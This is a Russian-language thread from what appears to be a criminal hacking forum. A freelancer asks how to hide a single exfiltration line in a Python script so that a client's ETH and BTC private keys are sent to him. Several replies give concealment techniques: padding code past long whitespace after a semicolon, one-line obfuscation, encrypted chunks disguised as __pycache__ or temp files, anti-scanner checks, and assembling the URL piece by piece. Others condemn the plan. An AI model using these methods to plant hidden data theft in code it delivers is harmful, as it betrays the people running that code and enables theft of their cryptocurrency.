• XSS.stack #1 – первый литературный журнал от юзеров форума

Как спрятать бэкдор в питон скрипте?

stdusr

floppy-диск
Пользователь
Реакции
1
Здравствуйте,
иногда занимаюсь фрилансом, получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC). Но т.к. заказчик мне не родственник, ни друг и из недружественной страны, я очень хотел бы, что скрипт отправил эту инфу мне. Заказчик тоже не дурак, он требует, что скрипт был только из одного файла, без каких либо внешних библиотек. В принципе мне надо как то спрятать в скрипте одну строку:
Python:
requests.post('url', 'инфа')
Если я пошифрую эту строку кода и пробую такие варианты, как:
Python:
eval('пошифрованный код')
или
exec('пошифрованный код')
то сразу создает подозрение. Может у кого есть другие идеи? Какие нибудь хитрости с юникодом? За дельный совет, и если он прокатит, обещаю 10% от выхлопа. Гарантий, конечно немогу дать, просто честное слово :)

Пожалуйста, обратите внимание, что пользователь заблокирован
Никак, любой человек который видел синтаксис пару раз (грубо говоря), задастся вопросом что делают твои лишние строки.
А учитывая что ты там скрипт для валют пишешь, проверка будет.

Если код небольшой, то довольно сложно что-то сделать. Как вариант, запутать код и сделать его вырвиглазным, но в сторону сложности и длины.
Одной строки будет маловато. Если чел не глупый, он проверит скрипт на отстук как минимум сканерами трафика, поэтому желательно подстраховаться и сделать примитивный антиэмуль, например с таймером и исключением, если процесс известного тебе сканера запущен.
Я бы понадеялся на некомпетентность пользователя и социальную инжерению. Но тут без каких либо гарантий. Я бы попробовал создать или запустить другой питон скрипт хранящийся в зашифрованном виде, возможно кусками и расшифровывать его сразу в консоль(если это возможно) или просто расшифровывать и запускать. Все это можно замаскировать как __pycache__ или временные файлы в темпе. Можно так же для маскировки использовать это и как буфер для основной функции скрипта и пытаться обосновать это пользователю быстродействием(ха-ха). В общем, социальная инженерия и только она, родная.

Да, наверно только это.
На питоне можно весь код в одну строчку захерачить, это самый лучший человеческий обфускатор ))
Не забывай что твой юрл могут перехватить любым снифером и по балде дать

Добавь к одной из строк точку с запятой и 100500 пробелов, потом добавь за пробелами твой код в одну строку, но надо иметь ввиду, что блоки кода таким образом не спрячешь, разве что засунуть их в eval. Но и да, я канеш крысятничество не поддерживаю, а осуждаю.

Добавь к одной из строк точку с запятой и 100500 пробелов, потом добавь за пробелами твой код в одну строку, но надо иметь ввиду, что блоки кода таким образом не спрячешь, разве что засунуть их в eval. Но и да, я канеш крысятничество не поддерживаю, а осуждаю.
Думал об этом, но скорее всего, скроллбары испортят все дело.

На питоне можно весь код в одну строчку захерачить, это самый лучший человеческий обфускатор ))
Не забывай что твой юрл могут перехватить любым снифером и по балде дать
Если бы мне такой скрипт передал фрилансер, я бы его нахуй послал сразу же.

Одно могу сказать - такие крысы и очень недалекие люди всегда сидят без денег. Просто мышление нищеброда.

Про крысятничество. Странно, форум завален инфой про CC, кардинг, малварь и т.д. Многие работают по самим черным темам. А если я поделюсь (уже) пизженными ключями с каким то арабом, почему это уже крысятничество? :)

Про крысятничество. Странно, форум завален инфой про CC, кардинг, малварь и т.д. Многие работают по самим черным темам. А если я поделюсь (уже) пизженными ключями с каким то арабом, почему это уже крысятничество? :)
Ну, тут все дело в собственной морали и принципах.
Кому-то мораль позволяет заниматься подобным, но при этом не мешает иметь принципы не работать по РУ\СНГ например. Не скамить форум, на котором сам сидишь и тд. Как выразился чел сверху: "не срать там, где ешь".
Ты фрилансер и брался за работу как фрилансер, если у тебя потом появляются мысли "наипать клиента" - то это не очень хорошо говорит за тебя. Если бы ты изначально имел цель бэкдорить свой продукт для заражения компаний-клиентов, для последующей раскрутки - тут другое дело.

Автор знатно троллит :D
Зато сколько пригоревших жоп, кококо воровать не хорошо. Сами то когда последний раз в церковь ходили? ?
не в том то дело, что хорошо или плохо. Здесь речь о компетентности человека. Если тебе поручили заказ и заплатили, то будь добр, выполни без реверс шелов, бекдоров, без отсутков на левый домен.
Если изначально у ТС была бы ситуация под типу "получил доступ к компу прогера, как мне туда вшить бекдор" - помогли бы.

Но даже если все гладко сделает, то при пропаже бабок с бтс первое подозрение упадет на него. А всякие такие обещалки процент от выхлопа - чистого рода пиздежь. Если например мне откидывали бы те обещанные бабки за бесплатную помощь (а таких людей не мало), то уверен могу тратить спокойно по 5-8k$ ежемесячно

Eval()0x3B0x200x65x760x610x6C0x280x29
Это все что можно сделать точка с запятой, 0x3B, там еще этот символ пустоты 0x20.
К сожалению мне не удалось написать тебе скрипт, пробухал и проторчал все за пару лет.
Python:
Eval()0x3B0x200x65x760x610x6C0x280x29
Python:
Eval()0x3B0x20Beval()

Последнее редактирование:
получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC)
А что за тз, что именно делает скрипт?
Клиент то может его запускать оффлайн или на виртуалке...

Здравствуйте,
иногда занимаюсь фрилансом, получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC). Но т.к. заказчик мне не родственник, ни друг и из недружественной страны, я очень хотел бы, что скрипт отправил эту инфу мне. Заказчик тоже не дурак, он требует, что скрипт был только из одного файла, без каких либо внешних библиотек. В принципе мне надо как то спрятать в скрипте одну строку:
Python:
requests.post('url', 'инфа')
Если я пошифрую эту строку кода и пробую такие варианты, как:
Python:
eval('пошифрованный код')
или
exec('пошифрованный код')
то сразу создает подозрение. Может у кого есть другие идеи? Какие нибудь хитрости с юникодом? За дельный совет, и если он прокатит, обещаю 10% от выхлопа. Гарантий, конечно немогу дать, просто честное слово :)
Если бы код был большим, а заказчик не шибко программист. То одна из версий могла бы выглядеть так:
Начало кода:
1.код
2. первый элемент списка "h"
3.код
4. добавить в список "t"
5. код
6. добавить в список "t"
...
100. собираешь список в урл
101. код
102. отправка результата по урл
103. код

Если бы код был большим, а заказчик не шибко программист. То одна из версий могла бы выглядеть так:
Начало кода:
1.код
2. первый элемент списка "h"
3.код
4. добавить в список "t"
5. код
6. добавить в список "t"
...
100. собираешь список в урл
101. код
102. отправка результата по урл
103. код
Кстати, можно и по либам разбить куски

автор говорит, что скрипт по ТЗ должен быть без зависимостей, а сам юзает requests... Хм, ну допустим. Второй момент - что за олени пишут стиллер на питоне? Третий момент - питон не обфусцируется из-за синтаксиса. Максимум в одну строку все перегнать, но любой онлайн-валидатор все выровняет. Юзать .pyc палево и не 100%-ный вариант (байткод можно прочесть даже в блокноте). В общем, это не тот язык, где ты сможешь что-то спрятать, только если заказчик полный лошпета и запускает не глядя.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх